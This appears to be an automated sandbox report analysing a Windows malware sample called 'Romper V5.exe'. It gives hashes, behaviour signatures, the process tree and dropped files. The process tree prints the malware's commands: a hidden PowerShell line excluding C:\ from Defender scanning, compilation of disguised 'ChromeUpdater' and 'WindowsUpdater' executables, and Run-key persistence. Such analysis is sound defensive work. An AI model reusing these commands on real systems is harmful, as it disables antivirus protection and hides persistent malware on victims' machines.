Analysis
-
max time kernel
145s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
01-07-2024 01:13
Behavioral task
behavioral1
Sample
Romper V5/Romper V5.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Romper V5/Romper V5.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
Romper V5/Romper V5/Romper V5.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Romper V5/Romper V5/Romper V5.exe
Resource
win10v2004-20240508-en
General
-
Target
Romper V5/Romper V5/Romper V5.exe
-
Size
30.1MB
-
MD5
20ccae603d435aab174b7b7e46ac7189
-
SHA1
c4c34d0a46c2f9532596f6dcb6fb86cc44046ab7
-
SHA256
cf675be72d39b1ee645b19bdbebbc615d6787d3f1c0e7ca9e2ef7c4396a7764b
-
SHA512
69658a3e15a9885691098976b89e8e2dd2936cbc78f0f0d58400dbf98fa14c4e170f9180b1ab130cc796b3a4b4245879e8406860770e03f3223a01d25532beb9
-
SSDEEP
786432:GW+e569MZLW+e569MuW+e569MgjW+e5i9M:GW+enhW+enuW+engjW+ev
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4732 powershell.exe 2788 powershell.exe 3472 powershell.exe 952 powershell.exe 3184 powershell.exe 2296 powershell.exe 232 powershell.exe 1928 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cscript.execscript.exeRomper V5.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation cscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation cscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation Romper V5.exe -
Executes dropped EXE 10 IoCs
Processes:
COOKD.EXECREAL.EXEDISCORD.EXECOOKD.EXECREAL.EXEPYTHON.EXEDISCORD.EXEPYTHON.EXEChromeUpdater.exeChromeUpdater.exepid process 2020 COOKD.EXE 4548 CREAL.EXE 3520 DISCORD.EXE 4916 COOKD.EXE 3176 CREAL.EXE 4316 PYTHON.EXE 2092 DISCORD.EXE 4716 PYTHON.EXE 2920 ChromeUpdater.exe 1392 ChromeUpdater.exe -
Loads dropped DLL 38 IoCs
Processes:
COOKD.EXECREAL.EXEDISCORD.EXEPYTHON.EXEpid process 4916 COOKD.EXE 4916 COOKD.EXE 3176 CREAL.EXE 3176 CREAL.EXE 4916 COOKD.EXE 2092 DISCORD.EXE 4916 COOKD.EXE 2092 DISCORD.EXE 4916 COOKD.EXE 4916 COOKD.EXE 4916 COOKD.EXE 4916 COOKD.EXE 4916 COOKD.EXE 4916 COOKD.EXE 4916 COOKD.EXE 3176 CREAL.EXE 3176 CREAL.EXE 3176 CREAL.EXE 3176 CREAL.EXE 3176 CREAL.EXE 3176 CREAL.EXE 3176 CREAL.EXE 3176 CREAL.EXE 2092 DISCORD.EXE 2092 DISCORD.EXE 2092 DISCORD.EXE 2092 DISCORD.EXE 2092 DISCORD.EXE 2092 DISCORD.EXE 2092 DISCORD.EXE 2092 DISCORD.EXE 2092 DISCORD.EXE 4716 PYTHON.EXE 4716 PYTHON.EXE 4716 PYTHON.EXE 4716 PYTHON.EXE 4716 PYTHON.EXE 4716 PYTHON.EXE -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
DISCORD.EXECREAL.EXECOOKD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WindowsUpdater.exe" DISCORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsStore = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WindowsStore.exe" CREAL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\ProgramData\\ChromeUpdater.exe" COOKD.EXE -
Detects Pyinstaller 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\COOKD.EXE pyinstaller C:\Users\Admin\AppData\Local\Temp\CREAL.EXE pyinstaller C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE pyinstaller C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4332 taskkill.exe 1032 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3472 powershell.exe 3472 powershell.exe 4732 powershell.exe 2788 powershell.exe 2788 powershell.exe 4732 powershell.exe 2296 powershell.exe 2296 powershell.exe 952 powershell.exe 952 powershell.exe 3184 powershell.exe 3184 powershell.exe 2296 powershell.exe 952 powershell.exe 3184 powershell.exe 1928 powershell.exe 232 powershell.exe 1928 powershell.exe 232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3472 powershell.exe Token: SeDebugPrivilege 4732 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 232 powershell.exe Token: SeDebugPrivilege 4332 taskkill.exe Token: SeDebugPrivilege 1032 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Romper V5.exeCOOKD.EXECREAL.EXEDISCORD.EXEPYTHON.EXEPYTHON.EXECREAL.EXEDISCORD.EXECOOKD.EXEpowershell.exepowershell.exepowershell.execmd.execmd.execmd.execsc.execsc.execsc.execscript.execscript.execmd.exedescription pid process target process PID 3636 wrote to memory of 2020 3636 Romper V5.exe COOKD.EXE PID 3636 wrote to memory of 2020 3636 Romper V5.exe COOKD.EXE PID 3636 wrote to memory of 4548 3636 Romper V5.exe CREAL.EXE PID 3636 wrote to memory of 4548 3636 Romper V5.exe CREAL.EXE PID 3636 wrote to memory of 3520 3636 Romper V5.exe DISCORD.EXE PID 3636 wrote to memory of 3520 3636 Romper V5.exe DISCORD.EXE PID 2020 wrote to memory of 4916 2020 COOKD.EXE COOKD.EXE PID 2020 wrote to memory of 4916 2020 COOKD.EXE COOKD.EXE PID 3636 wrote to memory of 4316 3636 Romper V5.exe PYTHON.EXE PID 3636 wrote to memory of 4316 3636 Romper V5.exe PYTHON.EXE PID 4548 wrote to memory of 3176 4548 CREAL.EXE CREAL.EXE PID 4548 wrote to memory of 3176 4548 CREAL.EXE CREAL.EXE PID 3520 wrote to memory of 2092 3520 DISCORD.EXE DISCORD.EXE PID 3520 wrote to memory of 2092 3520 DISCORD.EXE DISCORD.EXE PID 4316 wrote to memory of 4716 4316 PYTHON.EXE PYTHON.EXE PID 4316 wrote to memory of 4716 4316 PYTHON.EXE PYTHON.EXE PID 4716 wrote to memory of 3660 4716 PYTHON.EXE cmd.exe PID 4716 wrote to memory of 3660 4716 PYTHON.EXE cmd.exe PID 3176 wrote to memory of 2788 3176 CREAL.EXE powershell.exe PID 3176 wrote to memory of 2788 3176 CREAL.EXE powershell.exe PID 2092 wrote to memory of 3472 2092 DISCORD.EXE svchost.exe PID 2092 wrote to memory of 3472 2092 DISCORD.EXE svchost.exe PID 4916 wrote to memory of 4732 4916 COOKD.EXE powershell.exe PID 4916 wrote to memory of 4732 4916 COOKD.EXE powershell.exe PID 3472 wrote to memory of 2296 3472 powershell.exe powershell.exe PID 3472 wrote to memory of 2296 3472 powershell.exe powershell.exe PID 2092 wrote to memory of 4064 2092 DISCORD.EXE cmd.exe PID 2092 wrote to memory of 4064 2092 DISCORD.EXE cmd.exe PID 2788 wrote to memory of 3184 2788 powershell.exe powershell.exe PID 2788 wrote to memory of 3184 2788 powershell.exe powershell.exe PID 4732 wrote to memory of 952 4732 powershell.exe powershell.exe PID 4732 wrote to memory of 952 4732 powershell.exe powershell.exe PID 4064 wrote to memory of 3340 4064 cmd.exe csc.exe PID 4064 wrote to memory of 3340 4064 cmd.exe csc.exe PID 4064 wrote to memory of 3340 4064 cmd.exe csc.exe PID 4916 wrote to memory of 3692 4916 COOKD.EXE cmd.exe PID 4916 wrote to memory of 3692 4916 COOKD.EXE cmd.exe PID 3176 wrote to memory of 4864 3176 CREAL.EXE svchost.exe PID 3176 wrote to memory of 4864 3176 CREAL.EXE svchost.exe PID 4864 wrote to memory of 2196 4864 cmd.exe csc.exe PID 4864 wrote to memory of 2196 4864 cmd.exe csc.exe PID 4864 wrote to memory of 2196 4864 cmd.exe csc.exe PID 3692 wrote to memory of 4632 3692 cmd.exe WerFault.exe PID 3692 wrote to memory of 4632 3692 cmd.exe WerFault.exe PID 3692 wrote to memory of 4632 3692 cmd.exe WerFault.exe PID 2196 wrote to memory of 3168 2196 csc.exe cvtres.exe PID 2196 wrote to memory of 3168 2196 csc.exe cvtres.exe PID 2196 wrote to memory of 3168 2196 csc.exe cvtres.exe PID 3340 wrote to memory of 3588 3340 csc.exe cvtres.exe PID 3340 wrote to memory of 3588 3340 csc.exe cvtres.exe PID 3340 wrote to memory of 3588 3340 csc.exe cvtres.exe PID 4632 wrote to memory of 1216 4632 csc.exe svchost.exe PID 4632 wrote to memory of 1216 4632 csc.exe svchost.exe PID 4632 wrote to memory of 1216 4632 csc.exe svchost.exe PID 2092 wrote to memory of 3564 2092 DISCORD.EXE cscript.exe PID 2092 wrote to memory of 3564 2092 DISCORD.EXE cscript.exe PID 4916 wrote to memory of 3896 4916 COOKD.EXE cscript.exe PID 4916 wrote to memory of 3896 4916 COOKD.EXE cscript.exe PID 3896 wrote to memory of 4404 3896 cscript.exe cmd.exe PID 3896 wrote to memory of 4404 3896 cscript.exe cmd.exe PID 3564 wrote to memory of 1692 3564 cscript.exe cmd.exe PID 3564 wrote to memory of 1692 3564 cscript.exe cmd.exe PID 4404 wrote to memory of 3096 4404 cmd.exe cmd.exe PID 4404 wrote to memory of 3096 4404 cmd.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Romper V5\Romper V5\Romper V5.exe"C:\Users\Admin\AppData\Local\Temp\Romper V5\Romper V5\Romper V5.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\COOKD.EXE"C:\Users\Admin\AppData\Local\Temp\COOKD.EXE"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\COOKD.EXE"C:\Users\Admin\AppData\Local\Temp\COOKD.EXE"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process powershell -Verb runAs -ArgumentList \"-Command Set-MpPreference -ExclusionPath c:\\\" -WindowStyle Hidden"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -ExclusionPath c:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\ProgramData\ChromeUpdater.exe C:\Users\Admin\AppData\Local\Temp\ChromeUpdater.cs > nul 2>&14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\ProgramData\ChromeUpdater.exe C:\Users\Admin\AppData\Local\Temp\ChromeUpdater.cs5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES596A.tmp" "c:\ProgramData\CSC70F3AE67E1044FC39083E0D1CB19643B.TMP"6⤵
-
C:\Windows\SYSTEM32\cscript.execscript.exe //nologo C:\Users\Admin\AppData\Local\Temp\launch.vbs4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\Temp\temporary.cmd5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\temporary.cmd6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\curl.execurl -L -o "C:\Users\Admin\AppData\Local\Temp\python-installer.exe" "https://www.python.org/ftp/python/+FullyQualifiedErrorId/python-+FullyQualifiedErrorId-amd64.exe"7⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im "python-installer.exe"7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ChromeUpdater.exe"C:\ProgramData\ChromeUpdater.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2920 -s 7808⤵
-
C:\Users\Admin\AppData\Local\Temp\CREAL.EXE"C:\Users\Admin\AppData\Local\Temp\CREAL.EXE"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\CREAL.EXE"C:\Users\Admin\AppData\Local\Temp\CREAL.EXE"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process powershell -Verb runAs -ArgumentList \"-Command Set-MpPreference -ExclusionPath c:\\\" -WindowStyle Hidden"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -ExclusionPath c:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\Temp\WindowsStore.exe C:\Users\Admin\AppData\Local\Temp\WindowsStore.cs > nul 2>&14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\Temp\WindowsStore.exe C:\Users\Admin\AppData\Local\Temp\WindowsStore.cs5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES593C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA4EECB7DA98049BDADFBE211AA54BB8A.TMP"6⤵
-
C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE"C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE"C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process powershell -Verb runAs -ArgumentList \"-Command Set-MpPreference -ExclusionPath c:\\\" -WindowStyle Hidden"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -ExclusionPath c:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.exe C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.cs > nul 2>&14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.exe C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.cs5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES594B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2BE10D6FC34B989FD9DAC66F23DCCC.TMP"6⤵
-
C:\Windows\SYSTEM32\cscript.execscript.exe //nologo C:\Users\Admin\AppData\Local\Temp\launch.vbs4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\Temp\temporary.cmd5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\temporary.cmd6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\curl.execurl -L -o "C:\Users\Admin\AppData\Local\Temp\python-installer.exe" "https://www.python.org/ftp/python/+FullyQualifiedErrorId/python-+FullyQualifiedErrorId-amd64.exe"7⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im "python-installer.exe"7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ChromeUpdater.exe"C:\ProgramData\ChromeUpdater.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE"C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE"C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\COOKD.EXEFilesize
7.5MB
MD5a4d88d60fdebe4d85736d7684de377d5
SHA13cd96116e5ee43b28a499ea48eff1533b029d8be
SHA25613611a82912fc262cec5433aeb83c62e6488c5931359749c8a29dcc3bc66c731
SHA512739223bae82b42c55bdabc0e7d94d0f9daf4b130317122a491ad36e34da0f3a6ba30e87ef0aeba4319aded8a156f31ffdbcb803921f208c7e00ea7ee11e144b5
-
C:\Users\Admin\AppData\Local\Temp\CREAL.EXEFilesize
7.5MB
MD52dc33067754eb099bd137180a357088b
SHA165ec6e077726a462fe96c32f0540891e76cabc4e
SHA25678b6b54a4643d3648f9653cfd9ec89b0d158f586647e7afc1b78113e1b988585
SHA512b0073ba54eebfc0afc1ce8c72d9dc87050e434d77f86d2c3d4cfc00c2d84463cd0ab7891e74eaea92de46c934ff13f61202d4f33d6209e45b4b96e064348d7fa
-
C:\Users\Admin\AppData\Local\Temp\DISCORD.EXEFilesize
7.4MB
MD53cc78ec13e19e7deacb003b556afa189
SHA126f4ce646c930464b07c3eb8d7f888354df0f73b
SHA256c11cf38be5e32cf2f7172a47dd93bff04168b4f607a26558d84b90783ba67372
SHA51223bd312a390f7779085732a648026bb06f215ebde483dd1b824b53be03382173b0626be5683860c0c3b806dd081677165b99305ff8990c086231f818f03828b8
-
C:\Users\Admin\AppData\Local\Temp\PYTHON.EXEFilesize
7.3MB
MD5ac69ea4dae2d61194cedc40f423fc240
SHA19ec71b517b7e7c36091dbf96fb8eb0577cf0b7f2
SHA256aabbc779eef339c207509e4ca1ab3cf82abe780c3a5c2cecf39cb3730de5cf61
SHA5120c224aeccc66a19bc2ab2911c70a7b2a6bbd5c4cc8f57c3001c7e1f6dfb5c2aa310b73e669592a9c3f244d352bff37f5c912ed37a4e860a62ef1a508de1acc8b
-
C:\Users\Admin\AppData\Local\Temp\_MEI20202\VCRUNTIME140.dllFilesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
C:\Users\Admin\AppData\Local\Temp\_MEI20202\_hashlib.pydFilesize
63KB
MD5f495d1897a1b52a2b15c20dcecb84b47
SHA18cb65590a8815bda58c86613b6386b5982d9ec3f
SHA256e47e76d70d508b62924fe480f30e615b12fdd7745c0aac68a2cddabd07b692ae
SHA512725d408892887bebd5bcf040a0ecc6a4e4b608815b9dea5b6f7b95c812715f82079896df33b0830c9f787ffe149b8182e529bb1f78aadd89df264cf8853ee4c4
-
C:\Users\Admin\AppData\Local\Temp\_MEI20202\_wmi.pydFilesize
35KB
MD5ee33f4c8d17d17ad62925e85097b0109
SHA18c4a03531cf3dbfe6f378fdab9699d51e7888796
SHA25679adca5037d9145309d3bd19f7a26f7bb7da716ee86e01073c6f2a9681e33dad
SHA51260b0705a371ad2985db54a91f0e904eea502108663ea3c3fb18ed54671be1932f4f03e8e3fd687a857a5e3500545377b036276c69e821a7d6116b327f5b3d5c1
-
C:\Users\Admin\AppData\Local\Temp\_MEI20202\base_library.zipFilesize
1.3MB
MD53909f1a45b16c6c6ef797032de7e3b61
SHA15a243f6c8db11bf401aeac69f4c2a0c6cd63b3a8
SHA25656cce68da6a7ebd11aab4b4a4e6a164647b42b29ae57656532c530d1e22e5b44
SHA512647e343eb9732150c0fd12c7142a960ede969b41d5a567940e89636f021f0c0b3249b6cfc99c732190085bcae7aa077f8ac52c8e7fe7817d48a34489f0cd5148
-
C:\Users\Admin\AppData\Local\Temp\_MEI20202\python312.dllFilesize
6.6MB
MD55c5602cda7ab8418420f223366fff5db
SHA152f81ee0aef9b6906f7751fd2bbd4953e3f3b798
SHA256e7890e38256f04ee0b55ac5276bbf3ac61392c3a3ce150bb5497b709803e17ce
SHA51251c3b4f29781bb52c137ddb356e1bc5a37f3a25f0ed7d89416b14ed994121f884cb3e40ccdbb211a8989e3bd137b8df8b28e232f98de8f35b03965cfce4b424f
-
C:\Users\Admin\AppData\Local\Temp\_MEI20202\pywin32_system32\pywintypes312.dllFilesize
131KB
MD526d752c8896b324ffd12827a5e4b2808
SHA1447979fa03f78cb7210a4e4ba365085ab2f42c22
SHA256bd33548dbdbb178873be92901b282bad9c6817e3eac154ca50a666d5753fd7ec
SHA51299c87ab9920e79a03169b29a2f838d568ca4d4056b54a67bc51caf5c0ff5a4897ed02533ba504f884c6f983ebc400743e6ad52ac451821385b1e25c3b1ebcee0
-
C:\Users\Admin\AppData\Local\Temp\_MEI20202\win32\win32api.pydFilesize
130KB
MD53a80fea23a007b42cef8e375fc73ad40
SHA104319f7552ea968e2421c3936c3a9ee6f9cf30b2
SHA256b70d69d25204381f19378e1bb35cc2b8c8430aa80a983f8d0e8e837050bb06ef
SHA512a63bed03f05396b967858902e922b2fbfb4cf517712f91cfaa096ff0539cf300d6b9c659ffee6bf11c28e79e23115fd6b9c0b1aa95db1cbd4843487f060ccf40
-
C:\Users\Admin\AppData\Local\Temp\_MEI35202\VCRUNTIME140_1.dllFilesize
48KB
MD57e668ab8a78bd0118b94978d154c85bc
SHA1dbac42a02a8d50639805174afd21d45f3c56e3a0
SHA256e4b533a94e02c574780e4b333fcf0889f65ed00d39e32c0fbbda2116f185873f
SHA51272bb41db17256141b06e2eaeb8fc65ad4abdb65e4b5f604c82b9e7e7f60050734137d602e0f853f1a38201515655b6982f2761ee0fa77c531aa58591c95f0032
-
C:\Users\Admin\AppData\Local\Temp\_MEI35202\_bz2.pydFilesize
82KB
MD5c7ce973f261f698e3db148ccad057c96
SHA159809fd48e8597a73211c5df64c7292c5d120a10
SHA25602d772c03704fe243c8de2672c210a5804d075c1f75e738d6130a173d08dfcde
SHA512a924750b1825747a622eef93331fd764d824c954297e37e8dc93a450c11aa7ab3ad7c3b823b11656b86e64de3cd5d409fda15db472488dfaa4bb50341f0b29d1
-
C:\Users\Admin\AppData\Local\Temp\_MEI35202\_decimal.pydFilesize
247KB
MD521c73e7e0d7dad7a1fe728e3b80ce073
SHA17b363af01e83c05d0ea75299b39c31d948bbfe01
SHA256a28c543976aa4b6d37da6f94a280d72124b429f458d0d57b7dbcf71b4bea8f73
SHA5120357102bffc2ec2bc6ff4d9956d6b8e77ed8558402609e558f1c1ebc1baca6aeaa5220a7781a69b783a54f3e76362d1f74d817e4ee22aac16c7f8c86b6122390
-
C:\Users\Admin\AppData\Local\Temp\_MEI35202\libcrypto-3.dllFilesize
4.9MB
MD551e8a5281c2092e45d8c97fbdbf39560
SHA1c499c810ed83aaadce3b267807e593ec6b121211
SHA2562a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA51298b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb
-
C:\Users\Admin\AppData\Local\Temp\_MEI35202\unicodedata.pydFilesize
1.1MB
